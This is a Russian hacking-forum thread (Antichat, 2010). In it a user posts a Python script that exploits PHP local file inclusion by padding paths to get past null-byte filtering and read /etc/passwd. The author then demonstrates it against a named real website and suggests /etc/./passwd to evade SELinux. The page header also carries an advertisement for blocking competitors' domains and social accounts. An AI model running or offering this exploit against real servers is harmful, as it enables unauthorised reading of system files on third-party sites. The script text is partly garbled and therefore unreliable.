Обход фильтрации нуль байта

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Обход фильтрации нуль байта

Опции темы

Поиск в этой теме

Опции просмотра

07.09.2010, 23:58

overxor

Новичок

Регистрация: 11.09.2009

Сообщений: 23

Провел на форуме:
64270

Репутация: 23

Данный метод работает во всех версиях php кроме последней 5.3.3

Смысл в том, чтобы забивать путь в начале файла произвольными символами.

Код:

#!/usr/bin/env python
# Null byte filter bypass
import urllib, sys

if len(sys.argv)  [file] [true]: "
	exit()

file = "../../../../../../../etc/passwd";
true = "root"

if len(sys.argv) > 3:
	file = sys.argv[2]
	true = sys.argv[3]

url = sys.argv[1]

for i in xrange(900, 4096):
	sys.stderr.write("\rTry: " + str(i))

	d = "t" * i
	try:
		fd = urllib.urlopen(url + d + file)
	except:
		print "Error connect"
		sys.exit(1)

	data = fd.read()
	fd.close()

	if data.find(true) > -1:
		print '\n', data
		exit(0)

08.09.2010, 12:18

overxor

Новичок

Регистрация: 11.09.2009

Сообщений: 23

Провел на форуме:
64270

Репутация: 23

На это и нацелен скрипт. чтобы обходить magic quotes.

Иначе смысл было бы создавать тред.

09.09.2010, 02:20

chekist

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 177

Провел на форуме:
1246854

Репутация: 622

чё за бред, ни фига не пашет (5.2.6)

09.09.2010, 14:28

overxor

Новичок

Регистрация: 11.09.2009

Сообщений: 23

Провел на форуме:
64270

Репутация: 23

Не согласен, вполне нормально работает.

К примеру:

python fazzer.py "http://www.bela.bg/?page_id=9&article_id=1000220&coments=yes&page="

Try: 4041

Возможно у тебя selinux блочит запросы напрямую в урле, если видит /etc/passwd. Пробуй /etc/./passwd

Если не получится скинь в приват, я посмотрю.